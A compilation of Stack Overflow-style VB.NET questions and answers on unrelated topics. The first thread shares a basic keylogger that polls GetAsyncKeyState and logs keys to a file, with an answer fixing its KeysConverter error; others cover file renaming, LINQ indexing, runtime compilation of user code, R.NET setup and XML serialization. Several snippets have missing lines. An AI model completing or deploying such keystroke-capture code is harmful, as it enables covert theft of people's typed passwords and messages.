Unable to use KeysConverter in a keylogger program - vb.net

I am trying to create a basic keylogging program. I am interested in cyber security and want to learn more. I have hashed together the code below from various sources.
The line text = converter.ToString(i) generates an index out of bounds error.
I am thinking that this is because the object converter has not been instantiated as it should?? But how to fix it?
Imports System.IO
Imports System.Text
Imports System.Windows.Forms
Imports System.Runtime.InteropServices
Imports System.Threading
Module Module1
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short
Sub Main()
Dim filepath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments)
filepath &= "\LogsFolder\"
If (Not Directory.Exists(filepath)) Then
End If
Dim Path = (filepath & "LoggedKeys.text")
If Not File.Exists(Path) Then
Using sw As StreamWriter = File.CreateText(Path)
End Using
End If
Dim Converter = New KeysConverter()
Dim text As String = ""
While (True)
For i As Integer = 0 To 1999
Dim key = GetAsyncKeyState(i)
If key = 1 Or key = -32767 Then
text = converter.ToString(i)
Using sw As StreamWriter = File.AppendText(Path)
End Using
Exit For
End If
End While
End Sub
End Module

Looks like you're looking for the ConvertToString method.
Replace the following line:
text = converter.ToString(i)
text = converter.ConvertToString(i)
Edit to address your concerns in the comments:
I get a syntax error, 'ConvertToString' is not a member of KeysConverter... it sounds like my instantiation has not worked.
Hover with the mouse cursor over your Converter variable and double-check its type. Make sure that KeysConverter actually is the System.Windows.Forms.KeysConverter class and not some kind of a local generated class.
MyImports System.Windows.Forms statement is ghosted - suggesting that its never used.
That's what I suspected. You seem to be in a Console application and you're accessing a class within the System.Windows.Forms namespace which is not included in the Console app. You need to add a reference to System.Windows.Forms.dll as explained in this answer.
Also, make sure you locate and delete the generated KeysConverter class from your project so you avoid conflicts.


Rename files sequentially

with reference to Renaming all files in a folder
on running the below code, get type def errors:
Type 'DirectoryInfo' is not defined
Type 'FileInfo' is not defined
how to resolve these errors. Please suggest.
Dim sourcePath As String = "E:\testrenamerbackup\vbdotnet"
Dim searchPattern As String = "*.doc"
Dim curDir As New DirectoryInfo(sourcePath)
Dim i As Integer = 0
For Each fi As FileInfo In curDir.GetFiles(searchPattern).OrderBy(Function(num) num.CreationTime)
File.Move(fi.FullName, Path.Combine(fi.Directory.FullName, "docFile_" & i & ".doc"))
i += 1
Add Import System.IO on top of your vb.net class file, for example
Imports System
Imports System.IO
Public Class Test
Public Shared Sub Main()
' your code...
End Sub
End Class
System.IO Namespace contains types that allow reading and writing to files and data streams, and types that provide basic file and directory support including DirectoryInfo, FileInfo. by adding Import System.IO you can use those types and methods in the namespace.

Importing System.Linq solves "Class cannot be indexed" error

I have the following code which is failing to compile:
Dim ContentSent As HashSet(Of String) = New HashSet(Of String)(SubscriberContent.ContentIdSent.Split(","))
content = New Content
' The next line causes causing the error
content = contentCollection.Find(Function(x) x.CntId = Convert.ToInt32(ContentSent(0)))
The error it gets is:
Class cannot be indexed because it has no default property
That makes sense. The weird thing is, when I import System.Linq the compilation error disappears.
For a more simple example, this code gets the error:
Imports System
Imports System.Collections.Generic
Module MyModule
Public Sub Main()
Dim x As IEnumerable(Of Integer) = {0, 1, 2, 3}
Dim item As Integer = x(3) ' Gets error on this line
End Sub
End Module
But this works:
Imports System
Imports System.Collections.Generic
Imports System.Linq ' This is the only difference!
Module MyModule
Public Sub Main()
Dim x As IEnumerable(Of Integer) = {0, 1, 2, 3}
Dim item As Integer = x(3)
Console.WriteLine(item) ' Outputs "3"
End Sub
End Module
Why does importing the System.Linq namespace solve that particular error? It doesn't seem like it should.
Presumably the offending item is: ContentSent(0)
It appears that once you Import System.Linq, that VB automatically uses the extension method ElementAtOrDefault as a "pseudo default" indexer for ContentSent.
You can see this for yourself, if you backspace over the index and observe the Intellisense display.
#StevenDoggart's comment prompted me to revisit this issue. This behavior by VB is specified in the Visual Basic Language Specification.
This particular VB feature is known as the Default Query Indexer.
Default Query Indexer
Every queryable collection type whose element type is T and does not
already have a default property is considered to have a default
property of the following general form:
Public ReadOnly Default Property Item(index As Integer) As T
Return Me.ElementAtOrDefault(index)
End Get
End Property
The default property can only be referred to using the default
property access syntax; the default property cannot be referred to by
name. For example:
Dim customers As IEnumerable(Of Customer) = ...
Dim customerThree = customers(2)
' Error, no such property
Dim customerFour = customers.Item(4)
If the collection type does not have an ElementAtOrDefault member, a
compile-time error will occur.

How to compile code Entered by the user?

I need to make a simple vb.net program that runs a piece of code entered by the user (also in vb.net). But I need my program to compile and run it.
Anyone have an idea on how to do this?
I actually wrote a blog post (link below) about this several years ago. The below example is from 2010, and there may be better methods to solve this problem today. More explanation can be found in the code comments.
Read the code from the file.
Create an instance of a VB.NET CodeProvider
Create compiler parameters and pass them to the compiler
Compile the code
Check for errors
Create an instance of the class containing the code
Create arguments to pass to our compiled code
Execute the code and see results
An example of this being utilized to execute code in a text file and displaying a result in a TextBox is below, but could easily be used to parse code from a Textbox. (more info at vbCity Blog):
Imports System.IO
Imports System.Reflection
Imports System.CodeDom
Imports System.CodeDom.Compiler
Imports Microsoft.VisualBasic
' Read code from file
Dim input = My.Computer.FileSystem.ReadAllText("Code.txt")
' Create "code" literal to pass to the compiler.
' Notice the <% = input % > where the code read from the text file (Code.txt)
' is inserted into the code fragment.
Dim code = <code>
Imports System
Imports System.Windows.Forms
Public Class TempClass
Public Sub UpdateText(ByVal txtOutput As TextBox)
<%= input %>
End Sub
End Class
' Create the VB.NET Code Provider.
Dim vbProv = New VBCodeProvider()
' Create parameters to pass to the compiler.
Dim vbParams = New CompilerParameters()
' Add referenced assemblies.
vbParams.GenerateExecutable = False
' Ensure we generate an assembly in memory and not as a physical file.
vbParams.GenerateInMemory = True
' Compile the code and get the compiler results (contains errors, etc.)
Dim compResults = vbProv.CompileAssemblyFromSource(vbParams, code.Value)
' Check for compile errors
If compResults.Errors.Count > 0 Then
' Show each error.
For Each er In compResults.Errors
' Create instance of the temporary compiled class.
Dim obj As Object = compResults.CompiledAssembly.CreateInstance("TempClass")
' An array of object that represent the arguments to be passed to our method (UpdateText).
Dim args() As Object = {Me.txtOutput}
' Execute the method by passing the method name and arguments.
Dim t As Type = obj.GetType().InvokeMember("UpdateText", BindingFlags.InvokeMethod, Nothing, obj, args)
End If

How to get R.Net work with VB.Net

I am trying to get R.Net work with VB.NET. I translated an official example from c# to vb.net but it is not working. There are different things I tried. First I used the SetupHelper as explained on the official page.
Imports System.IO
Namespace RDotNetSetup
Public Class SetupHelper
Public Shared Sub SetupPath()
Dim oldPath = System.Environment.GetEnvironmentVariable("PATH")
Dim rPath = If(System.Environment.Is64BitProcess, "C:\Program Files\R\R-3.0.2\bin\x64", "C:\Program Files\R\R-3.0.2\bin\i386")
If Directory.Exists(rPath) = False Then
Throw New DirectoryNotFoundException(String.Format("Could not found the specified path to the directory containing R.dll: {0}", rPath))
End If
Dim newPath = String.Format("{0}{1}{2}", rPath, System.IO.Path.PathSeparator, oldPath)
System.Environment.SetEnvironmentVariable("PATH", newPath)
End Sub
End Class
End Namespace
Imports RDotNet
Imports ConsoleApplication36.RDotNetSetup
Imports System.Collections.Generic
Imports System.IO
Imports System.Linq
Imports System.Text
Imports System.Threading.Tasks
Module Module1
Sub Main()
Using engine As REngine = REngine.CreateInstance("RDotNet")
Dim charVec As CharacterVector = engine.CreateCharacterVector({"Hello, R world!, .NET speaking"})
engine.SetSymbol("greetings", charVec)
Dim a As String() = engine.Evaluate("'Hi there .NET, from the R engine'").AsCharacter().ToArray()
Console.WriteLine("R answered: '{0}'", a(0))
Console.WriteLine("Press any key to exit the program")
End Using
End Sub
End Module
I dont get an error, using the debugger at engine.Initialize my test stops running ( the green Start arrow reappears).
So I found another example that should (apparentely) works on VB.Net
Imports RDotNet
Imports System.IO
Imports System.Linq
Module Module1
Sub Main()
Dim envPath = System.Environment.GetEnvironmentVariable("PATH")
Dim rBinPath = "C:\Program Files\R\R-3.0.2\bin\i386"
System.Environment.SetEnvironmentVariable("PATH", envPath & Path.PathSeparator & rBinPath)
Dim engine As REngine = REngine.CreateInstance("RDotNet")
Dim group1 As NumericVector = engine.CreateNumericVector(New Double() {30.02, 29.99, 30.11, 29.97, 30.01, 29.99})
engine.SetSymbol("group1", group1)
' Direct parsing from R script.
Dim s = "group2 <- c(29.89, 29.93, 29.72, 29.98, 30.02, 29.98)"
Dim group2 = engine.Evaluate(s).AsNumeric()
Dim testResult As GenericVector = engine.Evaluate("t.test(group1, group2)").AsList()
Dim p As Double = testResult("p.value").AsNumeric().First()
Console.WriteLine("Group1: [{0}]", String.Join(", ", group1))
Console.WriteLine("Group2: [{0}]", String.Join(", ", group2))
Console.WriteLine("P-value = {0:0.000}", p)
End Sub
End Module
Looks like the writer had the same problem and just left the engine.initialize. If I execute the code I get the error: "Value out of range" at Dim group1 As NumericVector = engine.CreateNumericVector(New Double() {30.02, 29.99, 30.11, 29.97, 30.01, 29.99}).
Anyone who could help me get a sample code for VB.NET to work? And explain me why i cannot initialize.
fyi: I checked the path and set all needed references.
Ok, hours of trying and discussion later it works. What I did:
I changed .net 4.5 to .net 4.0
I changed compiler settings from "AnyCPU" to "x86"
First line in the 'SetupPath()' is: System.Environment.SetEnvironmentVariable("R_HOME", "C:\Program Files\R\R-3.0.2")

Save user-defined object into Windows Registry using VB.NET

I need to save created object into Windows Registry and after reopening application to read it? I know how to save and read string but this is complex object.
Any idea?
You maybe want to use a XmlSerializer (or other serializers). It's easy to use, and the documentation is full of examples.
But why storing it in the registry?
Better use Application Settings and User Settings.
Instead of the registry, save your object to a file in the ApplicationData directory of the user. You can get the path to this directory with
Full example:
Imports System.IO
Imports System.Xml.Serialization
Module Module1
Public Class MySuperClass
Public Property MyString() As String
Public Property MyInt() As Int32
End Class
Public Sub Main(ByVal args() As String)
Dim myFolder = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "MyApplication")
If Not Directory.Exists(myFolder) Then
End If
Dim myFile = Path.Combine(myFolder, "MySettings.txt")
Dim o = New MySuperClass With {.MyString = "Hi!", .MyInt = 42}
Dim x = New XmlSerializer(GetType(MySuperClass))
Using sr = New StreamWriter(myFile)
' Save directly to file
x.Serialize(sr, o)
End Using
' for demonstrating purpose
o = Nothing
Using sr = New StreamReader(myFile)
' Load directly from file
o = CType(x.Deserialize(sr), MySuperClass)
End Using
End Sub
End Module